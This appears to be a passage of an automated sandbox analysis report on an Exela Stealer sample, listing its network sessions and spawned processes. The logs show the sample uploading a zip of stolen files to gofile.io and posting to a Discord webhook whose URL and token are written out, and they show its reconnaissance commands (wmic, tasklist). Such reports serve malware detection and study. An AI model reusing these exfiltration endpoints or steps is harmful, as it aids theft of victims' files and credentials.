2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 4d e6 9e e4 68 bc 05 93 71 4c a1 57 6a 59 63 89 76 4b b9 46 ca d8 af 7c 1a ee 11 69 b6 a4 a4 c4 81 41 38 69 d8 d8 bb 1d 11 6d 78 84 6c 67 85 d8 4e 58 1f 4b 00 d6 f0 64 66 cd fd 0e f9 d9 93 a5 15 cf 1d 2b d3 f3 99 cd 08 2a 7a 8d e9 e3 e5 b2 69 21 b7 3d 27 a4 20 e9 9b ea ca 44 df f8 ca a7 be 91 83 e1 fb 17 c2 bc d3 4e 78 f9 42 28 a5 f7 7f 09 6b 76 a5 11 f1 34 70 bd 37 e3 7c 98 37 9a 08 a8 0c e9 0c 28 71 ba 31 81 df 0a 88 f1 ab 7e 09 ed 6e 87 2b e4 5a a9 c8 2b 72 d6 87 9b 2b 2a 32 e2 ea 8f 6e 52 61 65 01 2d 48 1d e2 c9 db 48 59 16 44 5a 78 57 ef 88 44 47 c3 5b 8d e0 9a 40 fa 3f f5 cd 01 0b ce af 46 de b3 e9 33 f3 b5 1c 79 6d 30 36 a8 d0 5e fc ae 44 fe 8f d5 f6 05 93 e7 0f a6 28 ee a6 6f db 9c 71 07 79 91 23 bf a9 65 37 0a 02 65 f6 49 75 6d 71 89 58 ad 42 ca Data Ascii: MhqLWjYcvKF\|iA8imxlgNXKdf+zi!=' DNxB(kv4p7\|7(q1~n+Z+r+2nRae-HHYDZxWDG[@?F3ym06^D(oqy#e7eIumqXB
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 08 7c 5b f9 f7 58 8d 0d 88 7f 59 b2 fc 30 75 83 17 e3 20 2d a6 4f 66 ca e6 c1 cc 56 bb 1e d9 32 8c 1a 01 e7 62 cd 01 b9 dd c9 55 cd 24 86 68 04 31 a1 fb 2a 1d 0a ad e8 24 0e 4c 16 a4 4e 57 71 e0 c6 eb bc 9a 24 c4 27 5b f2 4e 92 76 cf d0 43 95 b6 29 ae 83 17 f6 fb 7c 07 7e 14 91 93 c5 28 18 9c 59 87 1a 16 86 ed bc e5 cd d7 9d 77 07 6f 9f 16 5a cf a2 2d f6 93 45 1b bb 76 06 16 da 0a e1 d6 27 ac f4 f3 85 14 21 2e 9d eb 2a d0 07 c9 0c b4 87 4a 65 aa 04 c2 3e 2d 2b b9 c9 9f 68 cb be 3d 6b 0d c8 d1 30 d5 5b d4 dd 4c bf b2 4d 3d e8 e8 f5 5b 67 57 e4 cf a4 fc f3 bc 85 ce 8a 65 1a 9b 82 41 0f 6a 55 c0 b0 c2 32 2e 03 51 15 51 8a 2d 44 8e 3a 59 ad 68 38 2a 4b 7a 5f a5 d7 96 d2 fb af 24 9c 7f a9 a3 31 6c 68 ca 8e f6 f5 a0 35 b2 ce f2 50 9c 81 27 4a 88 69 69 0e 17 3a Data Ascii: \|[XY0u -OfV2bU$h1$LNWq$'[NvC)\|~(YwoZ-Ev'!.Je>-+h=k0[LM=[gWeAjU2.QQ-D:Yh8*Kz_$1lh5P'Jii:
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: f1 e0 5a 41 4f 90 3f c5 8a bf 41 e3 6b fd d7 0d e1 f1 49 fb 3d 99 f1 08 85 40 2b ca fb ab 53 cd 6b ba 49 b5 d5 fb a3 4d 18 a4 ff 40 72 97 c9 1a f2 69 8b 5c 22 d1 d1 e3 39 65 53 91 37 5f b3 64 cb 35 a9 b6 de 7f 58 5d f5 43 ef 04 fb af e8 fa 37 b2 1b e5 d1 e0 8d 34 ff b5 cf 63 e7 7d 0a 3c 87 c6 7d 58 3a f7 f2 07 74 04 27 47 28 74 ee cf ff 55 9f 59 ee 63 c1 16 09 7c 78 b0 36 3a 79 64 4c e9 a1 bc 1b 39 e4 cf 4e 0c 1a 83 7c be 94 b8 6b bd 86 46 2c 3f be 42 57 ba 0f 39 f1 03 6b 76 ce ab 5f 0f cf 03 f7 e3 f1 e4 63 ea 68 d7 b1 69 71 66 1d 07 00 ba b7 33 b9 9a e4 90 60 54 bd 3a df e3 2a 5c 5d ca 80 ee 5d 6b 9c 8f b1 f4 4e f9 6b 46 4e e3 73 c5 bb 52 1d 77 bf 4e 8a 52 8c cf c3 84 c0 78 4b 40 fe 90 fd 34 a8 92 36 38 f2 3f ab 50 e8 ca 67 99 31 a2 13 18 cf 98 c4 d5 87 Data Ascii: ZAO?AkI=@+SkIM@ri\"9eS7_d5X]C74c}<}X:t'G(tUYc\|x6:ydL9N\|kF,?BW9kv_chiqf3`T:*\]]kNkFNsRwNRxK@468?Pg1
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 79 1a 15 9f 5b 94 a1 59 82 bd 0c 67 7f a5 44 c8 4b ad f4 85 4e 52 1b 67 48 b1 9e f3 2d 6a 31 4c 5a e2 37 e9 0d 92 4c b9 61 10 75 02 a6 1b 48 4c 8d b3 05 dc fe 39 8a f9 38 8a e4 4c fb 88 ca 05 93 33 91 a3 49 33 ae 09 8c b6 8d 0d 16 13 be ba a1 f3 db aa 55 6f 76 67 68 63 88 10 71 29 74 65 0b 4b f4 a7 6d 51 03 e7 94 80 61 d6 b4 76 6b 00 03 93 7f 87 58 7e 61 d9 58 0e b0 3a 1f 8e 82 34 8b 47 25 b7 1a 03 f2 07 22 e7 39 b2 23 f2 34 f7 79 de 4d d3 89 9c a2 9e 53 a0 30 f3 d0 7c f0 e6 63 41 69 d0 af d1 d9 c9 c6 60 76 d0 af c8 73 1e 47 c5 99 01 85 11 b4 eb cb 7c f8 88 b6 80 bc 1a 6d 9a e1 ea 64 20 13 4e e1 09 0e d8 73 3d 0a ef fb b5 b8 1d 29 78 f5 99 1a 48 9b b7 ed b8 e2 d8 f2 b0 fc 91 fb b4 fc 75 21 74 c9 7f 52 6c 1e d4 42 e7 f2 72 53 20 1d bd d1 c6 3d f7 eb b1 77 Data Ascii: y[YgDKNRgH-j1LZ7LauHL98L3I3Uovghcq)teKmQavkX~aX:4G%"9#4yMS0\|cAi`vsG\|md Ns=)xHu!tRlBrS =w
2024-01-13 05:50:28 UTC	16384	OUT	Data Raw: 99 c0 76 0d 92 6a 28 66 5e f7 f3 03 dc f7 0e d2 8c c0 6f 8d bc bd 90 6e e7 dc 7e 7b d0 5a a4 ba b9 e9 f1 d6 88 dc 9a 9f b9 bb c9 73 6f cf 14 fe a7 00 f5 5b db 15 12 36 2b 1b 25 49 9c c2 ff 53 26 99 c4 8c 95 b1 07 82 ef ef 8e 61 fa dd aa 1c 62 e1 2f 91 c6 e2 ef e7 b9 38 19 e1 30 6e 84 c0 eb e9 42 90 57 6d 2e 35 53 a2 8e 0f a2 95 85 42 fa 01 89 68 a3 cf 8e 6d 5a 0e ac 66 56 df 94 15 40 ce 86 c7 18 75 1b 29 7c ed 07 dd 5e 17 88 e5 ba ce 5d d5 2d e9 3c 4f 1e ab cd 11 62 a4 97 b6 00 35 4c 8f 5c 99 1e e6 2a 60 b5 67 49 b6 fc bd 3b df 2c 2a 88 58 d4 48 4f 10 cc f8 0d ef 46 74 13 ae ef 93 ff 1e 42 53 c0 c0 69 4a fd 09 49 41 02 08 c3 d5 ca 3e 10 76 9f 23 f8 8a bf 3e be 41 89 43 7e a3 dc de ad 71 f5 0a f8 8a 89 48 d3 a6 33 eb 1f c6 39 cd 0b f8 29 a3 5d cf 3f 25 3c Data Ascii: vj(f^on~{Zso[6+%IS&ab/80nBWm.5SBhmZfV@u)\|^]-<Ob5L\`gI;,XHOFtBSiJIA>v#>AC~qH39)]?%<
2024-01-13 05:50:29 UTC	908	IN	HTTP/1.1 404 Not Found Date: Sat, 13 Jan 2024 05:50:29 GMT Content-Type: application/json Content-Length: 45 Connection: close strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1705125030 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H4X4LKwSel9ZQTXmcnvWKIUx2J03G%2BwsGdx0vPP3s6VVvxvewTz7yElHmr0TTqLfuyJXj%2BoBPSv%2F10J9O5MZPXuV6xEDyyAdJCxUw3RarviLt6lp1MdqpmSacwe6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Server: cloudflare CF-RAY: 844b5ca3cb52399a-IAD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49725	51.38.43.18	443	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-13 05:50:30 UTC	132	OUT	GET /getServer HTTP/1.1 Host: api.gofile.io Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1
2024-01-13 05:50:31 UTC	1077	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Origin: * Content-Length: 42 Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Content-Type: application/json; charset=utf-8 Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Date: Sat, 13 Jan 2024 05:50:31 GMT Etag: W/"2a-4631fb42WPfD17k7JGczdnxpWhM" Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-Dns-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Xss-Protection: 0 Connection: close
2024-01-13 05:50:31 UTC	42	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 22 3a 22 73 74 6f 72 65 34 22 7d 7d Data Ascii: {"status":"ok","data":{"server":"store4"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49726	31.14.70.245	443	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-13 05:50:32 UTC	238	OUT	POST /uploadFile HTTP/1.1 Host: store4.gofile.io Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1 Content-Length: 18200 Content-Type: multipart/form-data; boundary=25df96f40f0047fb993b05dad82e6739
2024-01-13 05:50:32 UTC	36	OUT	Data Raw: 2d 2d 32 35 64 66 39 36 66 34 30 66 30 30 34 37 66 62 39 39 33 62 30 35 64 61 64 38 32 65 36 37 33 39 0d 0a Data Ascii: --25df96f40f0047fb993b05dad82e6739
2024-01-13 05:50:32 UTC	150	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 39 37 34 0d 0a 0d 0a Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"Content-Length: 17974
2024-01-13 05:50:32 UTC	16384	OUT	Data Raw: 50 4b 03 04 14 00 00 00 08 00 d5 4e 45 57 e6 66 3b 72 84 02 00 00 02 04 00 00 0e 00 00 00 42 51 4a 55 57 4f 59 52 54 4f 2e 6d 70 33 15 93 49 8e 40 21 08 44 f7 9d f4 a1 44 bf 23 4e 28 8a de ff 20 6d c7 05 89 09 a1 8a 7a 40 8f bc eb a1 59 51 ee 97 b4 18 1c 9b 4a b6 59 8f 23 d4 ec 6e da d6 8c 53 08 eb 19 db 9c 92 5c 04 f8 92 6f 93 61 44 73 77 e0 64 fa 9a bd ab 2f c4 16 53 6d 73 33 8e 94 04 47 c5 75 88 be 25 6b 5c b4 bd 83 a4 a4 f3 41 04 da 2d 66 f0 05 ec ec 0c dc ec 11 0c 8a 8a eb 18 4c a1 7b 96 f8 b0 af 98 cb a7 c4 28 30 8d 8d 1b d2 d6 bd bb 46 d6 4c 75 19 d3 18 9f bd 93 4d ac a9 9a 8b 2a 6c 15 34 48 69 c2 f9 5a e2 05 dd c4 f0 95 af bd 89 d3 40 35 6a 25 53 2a 52 39 05 52 ea d0 1c f0 0c 51 e7 2b 43 27 43 37 f8 68 0c b7 2a bd c6 2e aa 3e 95 2b 30 5f 18 94 da Data Ascii: PKNEWf;rBQJUWOYRTO.mp3I@!DD#N( mz@YQJY#nS\oaDswd/Sms3Gu%k\A-fL{(0FLuMl4HiZ@5j%SR9RQ+C'C7h*.>+0_
2024-01-13 05:50:32 UTC	1590	OUT	Data Raw: 9a 08 65 c6 f7 77 d6 64 91 68 65 38 a5 76 3a 9f 59 66 92 11 0b 56 52 5c d2 60 aa ac d7 79 e5 99 9b eb 18 6b 87 fd 5d dc a1 3c d5 3a f9 9b 52 68 0f c4 27 9f b2 73 85 75 55 d5 e6 b9 4c 76 de 29 ca 65 8b d7 cc 46 13 cc 71 cd 95 1c 26 ee 31 15 8c 28 6a 8a 2d 65 18 77 1b 49 f9 06 f8 f6 9c 5a 97 94 6e 7c 29 98 f3 cd 47 6b f6 c9 bb 25 6d 0c b1 da d5 5e f5 fb f3 07 50 4b 01 02 14 00 14 00 00 00 08 00 d5 4e 45 57 e6 66 3b 72 84 02 00 00 02 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 b6 81 00 00 00 00 42 51 4a 55 57 4f 59 52 54 4f 2e 6d 70 33 50 4b 01 02 14 00 14 00 00 00 08 00 d5 4e 45 57 6d 3f 8e 9a 84 02 00 00 02 04 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b6 81 b0 02 00 00 43 5a 51 4b 53 44 44 4d 57 52 2e 64 6f 63 78 50 4b 01 02 14 00 14 00 00 00 08 00 d5 4e Data Ascii: ewdhe8v:YfVR\`yk]<:Rh'suULv)eFq&1(j-ewIZn\|)Gk%m^PKNEWf;rBQJUWOYRTO.mp3PKNEWm?CZQKSDDMWR.docxPKN
2024-01-13 05:50:32 UTC	2	OUT	Data Raw: 0d 0a Data Ascii:
2024-01-13 05:50:32 UTC	38	OUT	Data Raw: 2d 2d 32 35 64 66 39 36 66 34 30 66 30 30 34 37 66 62 39 39 33 62 30 35 64 61 64 38 32 65 36 37 33 39 2d 2d 0d 0a Data Ascii: --25df96f40f0047fb993b05dad82e6739--
2024-01-13 05:50:32 UTC	434	IN	HTTP/1.1 200 OK Server: nginx/1.25.3 Date: Sat, 13 Jan 2024 05:50:32 GMT Content-Type: application/json Content-Length: 313 Connection: close Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
2024-01-13 05:50:32 UTC	313	IN	Data Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 22 56 6e 4a 4d 67 35 22 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 56 6e 4a 4d 67 35 22 2c 22 66 69 6c 65 49 64 22 3a 22 35 65 38 31 32 65 30 35 2d 34 35 37 38 2d 34 36 32 65 2d 39 37 36 39 2d 38 38 33 33 34 32 62 33 61 64 37 61 22 2c 22 66 69 6c 65 4e 61 6d 65 22 3a 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 53 4b 38 5a 43 5a 36 76 36 58 50 37 48 54 77 72 4a 77 61 6d 74 30 47 61 44 62 6c 69 6a 47 77 63 22 2c 22 6d 64 35 22 3a 22 66 35 31 34 62 66 38 32 31 32 35 65 33 32 36 62 35 62 31 66 30 63 62 39 34 63 62 61 35 66 66 65 22 2c 22 70 61 72 65 6e 74 46 6f 6c 64 65 Data Ascii: {"data":{"code":"VnJMg5","downloadPage":"https://gofile.io/d/VnJMg5","fileId":"5e812e05-4578-462e-9769-883342b3ad7a","fileName":"StealedFilesByExela.zip","guestToken":"SK8ZCZ6v6XP7HTwrJwamt0GaDblijGwc","md5":"f514bf82125e326b5b1f0cb94cba5ffe","parentFolde

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49727	162.159.128.233	443	5828	C:\Users\user\Desktop\9afaXJv52z.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-13 05:50:32 UTC	276	OUT	POST /api/webhooks/1190831584878809150/43baozn0FAVEYDo8eF-XivB5Q0JQGjw6pMMgTYce34wCzvDF3gAtdM_zDzFY9WMg2T-- HTTP/1.1 Host: discord.com Accept: / Accept-Encoding: gzip, deflate User-Agent: Python/3.11 aiohttp/3.9.1 Content-Length: 521 Content-Type: application/json
2024-01-13 05:50:32 UTC	521	OUT	Data Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 53 74 65 61 6c 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d 62 Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "*Exela Stealer", "description": "Stealed Files*", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer \| https://github.com/quicaxd/Exela-V2.0"}, "thumb
2024-01-13 05:50:33 UTC	1365	IN	HTTP/1.1 404 Not Found Date: Sat, 13 Jan 2024 05:50:33 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=aa6eaf9ab1d711eeb2b12aa5ff753884; Expires=Thu, 11-Jan-2029 05:50:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1705125034 x-ratelimit-reset-after: 1 via: 1.1 google Alt-Svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6V2Wco0lmtpiRIp9Uv%2F26zoevI66cBr5OJ9ZNhqDtS3tcU4Is9nDgcDOPO%2ByQqXnRMpQtoEmzVFWpEWNX7VMLijiGTo0qmjG2bEqaM3Ue7C%2FrBksIA6pZEm9prb5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=aa6eaf9ab1d711eeb2b12aa5ff7538849237bb3b5d6d2c90007dbe710cf160c2fca5a7dda41e6a273e5df00fc07f4769; Expires=Thu, 11-Jan-2029 05:50:33 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c9ed6a3e83268c7c3fb7dd8277627ee24c608a2f-1705125033; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-01-13 05:50:33 UTC	205	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 37 47 77 55 42 38 45 61 57 57 67 31 48 62 32 36 31 7a 48 69 74 4b 64 33 32 79 43 6c 76 67 41 77 5a 63 71 55 53 30 48 43 53 44 6f 2d 31 37 30 35 31 32 35 30 33 33 30 36 36 2d 30 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 34 34 62 35 63 63 30 32 38 37 62 32 34 33 30 2d 49 41 44 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=7GwUB8EaWWg1Hb261zHitKd32yClvgAwZcqUS0HCSDo-1705125033066-0-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 844b5cc0287b2430-IAD
2024-01-13 05:50:33 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Target ID:	0
Start time:	06:50:02
Start date:	13/01/2024
Path:	C:\Users\user\Desktop\9afaXJv52z.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\9afaXJv52z.exe
Imagebase:	0x7ff6850b0000
File size:	16'417'517 bytes
MD5 hash:	4D70F444794DEDF45C2A6562D4EAED19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:50:03
Start date:	13/01/2024
Path:	C:\Users\user\Desktop\9afaXJv52z.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\9afaXJv52z.exe
Imagebase:	0x7ff6850b0000
File size:	16'417'517 bytes
MD5 hash:	4D70F444794DEDF45C2A6562D4EAED19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:50:05
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:50:05
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "gdb --version"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:	0x7ff746fb0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff68b4c0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:50:06
Start date:	13/01/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
